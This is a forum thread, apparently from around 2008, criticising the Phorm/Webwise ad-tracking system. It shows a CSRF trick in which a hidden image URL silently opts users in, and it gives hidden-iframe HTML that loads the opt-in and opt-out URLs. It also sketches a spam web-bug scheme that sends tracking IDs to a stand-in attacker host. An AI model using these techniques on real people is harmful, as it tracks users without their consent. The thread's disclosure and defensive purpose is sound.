Sponsored Links

Possible trivial Phorm opt-in "Exploit" discovered

Mel

0
I was doing a tiny bit of research on Phorm last night and it occurred to me that as the Opt-out is cookie based, it should be possible to opt-in an unwilling Phorm ISP customer using cross site request forgery (csrf).

All that's required is an image link which could be hidden on a webpage or in a forum post or blog etc.

Don't worry, no opt-in images here, but you can download my test page from rapidshare.

Download-Link #1: http://rapidshare.com/files/100013497/Phorm_opt-in_exploit.html

You can check your webwise opt-in/opt-out status here http://webwise.bt.com/webwise/
 
Last edited:
My webwise CSRF page has been temporarily made available at the following url

PHP:
http://www.toobadcs.co.uk/phorm/Phorm_opt-in_exploit.htm

I haven't made the link clickable so you'll have to copy the exploit URL to your address bar.

Warning by visiting this page Webwise will be enabled on your browser.

Don't forget to opt-out afterwards, or delete the a.webwise.net cookie.

If your ISP plans implementing Phorm/Webwise, then I think it might be wise to block the webwise.net domain.

On second thoughts, it might be wiser to choose a better ISP. :)
 
Last edited:
Sponsored Links
it might be wise to block the webwise.net domain
And, of course, if you're a bit forgetful (who, me? ;)) and have overlooked the fact that you blocked the darned thing about a fortnight ago when the Phorm story surfaced, you will have to temporarily allow it to get Mel's exploit to work in the first place. :rolleyes:

Having done that, yes, it did the job - but just as a minor point, Mel, there's an image top left that isn't showing up, and I don't *think* that's because of anything I've done.
I could be wrong, of course - I usually am. :D
 
And, of course, if you're a bit forgetful (who, me? ;)) and have overlooked the fact that you blocked the darned thing about a fortnight ago when the Phorm story surfaced, you will have to temporarily allow it to get Mel's exploit to work in the first place. :rolleyes:

Having done that, yes, it did the job - but just as a minor point, Mel, there's an image top left that isn't showing up, and I don't *think* that's because of anything I've done.
I could be wrong, of course - I usually am. :D

That's the exploit, I said it was really trivial to do.

I could make sure the image wasn't visible, but as it is only a demo I couldn't be bothered.

This flaw took me about two minutes to spot, makes me wonder how thorough the security audit was...:shrug:
 
Ah, right - I get it now, I hadn't twigged that it was a "non-image" rather than a "fake image", if you see what I mean, still expected to see something there.
This flaw took me about two minutes to spot
Mmm... doesn't exactly say a lot for the brains behind their system, does it? :hrmph:
 
:nod: Yep, your browser send an http request to the "image" url to fetch the image so it can display it, but as it is not actually an image doesn't render it.

As the "image" url is in fact for the Webwise opt-in, the webwise server replies with an opt-in cookie, and hey presto you've been press-ganged into Webwise.

There are more sophisticated ways to achieve a CSRF, I've even read it is possible to forge "referer" , but given that some popular applications strip "referer" from http requests, checking the referrer would not a particularly good approach to prevent csrf.
 
Last edited:
Sponsored Links
Just a tiny bit eh Mel? ;)

:nod: I just wanted to see what the opt-out cookie was like and makes sure my firewall rules blocked the site and I happened to look at a javascript.

As webwise is claimed to protect users against phishing, I suppose I should have made my demo "exploit" turn it off, although given browsers come with effective anti-phishing protection built in, I can't see the point :rolleyes:
 
Mel is very good on finding the loop holes for this it is just annoying that everytime I visit the webpage on the clan hosting I have to delete webwise cookie :) just using it to get me into a routine to check daily for a webwise cookie before I start to visit websites. :D

It is soo nice to do the search and find none
 
actually lve used my router to block it and that page was the perfect place to do the test...
 
Sponsored Links
Mel is very good on finding the loop holes for this it is just annoying that everytime I visit the webpage on the clan hosting I have to delete webwise cookie :) just using it to get me into a routine to check daily for a webwise cookie before I start to visit websites. :D

It is soo nice to do the search and find none


Well I used to fix software for a living, but it always helps when they are such blindingly obvious ones :D ;)


There's now another csrf test page on the Dephormation site
http://www.dephormation.org.uk/test_page.html
 
Thought I should provide a webwise "opt-out" link as I've read the BT webwise site's opt-in and opt-out has recently been temporarily disabled until the trial starts.

The following link will fetch a webwise opt-out cookie http://a.webwise.net/services/OO?op=out

If you are unfortunate enough to be with a "phorming" ISP, then unless they provide a proper (total) opt-out that doesn't involve cookies such as Talk Talk is said to be implementing, then your TCP stream will presumably still be intercepted and modified to trick your browser into providing cross-domain access to the webwise cookie, and according to the register content will still be mirrored to phorm's system, but you won't have a unique tracking ID.

If anyone wants to provide visitors to their website a Webwise opt-out button, hopefully something like the following code would work.

PHP:
<iframe name=hidden_iframe FRAMEBORDER=0 SCROLLING=NO height=1 width=1 ></iframe><BR>
<INPUT TYPE=button VALUE="Opt into Phorm" onClick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=in'">  
<INPUT TYPE=button VALUE='"Opt-out" of phorm' onClick="frames['hidden_iframe'].location.href='http://a.webwise.net/services/OO?op=out'">
 
Last edited:
Last edited:
or argue away with legal bs
 
Sponsored Links
BT and Phorm secretly tracked 18,000 customers in 2006

More secret BT trials... I've got shares in BT, perhaps I should be selling them in case the BT share price gets hit by a very large fine?


http://www.theregister.co.uk/2008/04/01/bt_phorm_2006_trial/

Exclusive BT secretly intercepted and profiled the web browsing of 18,000 of its broadband customers in 2006 using advertising technology provided by 121Media, the alleged spyware company that changed its name to Phorm last year.

BT Retail ran the "stealth" pilot without customer consent between 23 September and 6 October 2006. The technology was approved, pending a further trial*.

Documents seen by The Register show that the companies used the secret profiles to target advertising at broadband customers when they visited certain popular websites.

One senior source in the broadband industry we spoke to was appalled by BT's actions. "This is extremely serious," he said. "Data protection errors are generally viewed as a potentially bad thing by the industry, but not a real threat to an ISP's reputation. This seems like a breach of criminal law, which is much, much worse."

Even during the early phase of the BT/Phorm deal that the technical report describes, the pair were preparing to spin the technology to the public. "121Media [Phorm] will take action (both technical and public relations) to avoid any perception that their system is a virus, malware or spyware and to show that in effect it is a positive web development," BT wrote in the report.


Someone on the cableforum pointed out that Phorm is an anagram of morph, so I guess whoever came up with 121media's new name has a sense of humour.
 
Last edited:
Someone on the cableforum pointed out that Phorm is an anagram of morph, so I guess whoever came up with 121media's new name has a sense of humour.

Or when they were filling in the form coudn't think of a suitable name so spelt form wrong hence phorm... :laugh:
 
Linking email addresses to webwise UID by spamming?

Do any modern email clients still share cookies with a browser? Hmm, I guess webmail services.

Only it occurred to me that by spamming 'everybody'@a_phorming_isp.com with an html email that contained a webbug designed to capture the UID, it might be possible for a spammer to compile a database of UIDs linked to email addresses.

The webbug could be an http: image link containing the email address it was sent to (ie your email address) suitably escaped eg:-

http://somespammer.con/uidcaptureYourEmailAddress.jpg

If you view the email your client would request the image,

phorm would use its triple redirect jiggery-pokery to intercept this request and copy the webwise.net UID to a webwise cookie in somespammmer's domain.

The spammer's server would reply with a redirect to a https: php script eg

https://somespammer.con/uidcaptureYourEmailAddress.php

The client automatically requests the https: url sending the webwise UID cookie.

Using https: bypasses phorm's intercept of the UID cookie, delivering the UID and email address to the spammer.

The spammer then sells a service to websites that allows them to email targeted spam to visitors to their website.
 
Last edited:
Top
Cheap BIG ISPs for 100Mbps+
Community Fibre UK ISP Logo
150Mbps
Gift: None
Virgin Media UK ISP Logo
Virgin Media £24.00
132Mbps
Gift: None
Shell Energy UK ISP Logo
Shell Energy £26.99
109Mbps
Gift: None
Plusnet UK ISP Logo
Plusnet £27.99
145Mbps
Gift: None
Zen Internet UK ISP Logo
Zen Internet £28.00 - 35.00
100Mbps
Gift: None
Large Availability | View All
Cheapest ISPs for 100Mbps+
Gigaclear UK ISP Logo
Gigaclear £15.00
150Mbps
Gift: None
YouFibre UK ISP Logo
YouFibre £19.99
150Mbps
Gift: None
Community Fibre UK ISP Logo
150Mbps
Gift: None
BeFibre UK ISP Logo
BeFibre £21.00
150Mbps
Gift: £25 Love2Shop Card
Hey! Broadband UK ISP Logo
150Mbps
Gift: None
Large Availability | View All
Sponsored Links
The Top 15 Category Tags
  1. FTTP (5472)
  2. BT (3505)
  3. Politics (2524)
  4. Openreach (2291)
  5. Business (2251)
  6. Building Digital UK (2234)
  7. FTTC (2041)
  8. Mobile Broadband (1961)
  9. Statistics (1778)
  10. 4G (1654)
  11. Virgin Media (1608)
  12. Ofcom Regulation (1451)
  13. Fibre Optic (1392)
  14. Wireless Internet (1386)
  15. FTTH (1381)
Sponsored

Copyright © 1999 to Present - ISPreview.co.uk - All Rights Reserved - Terms  ,  Privacy and Cookie Policy  ,  Links  ,  Website Rules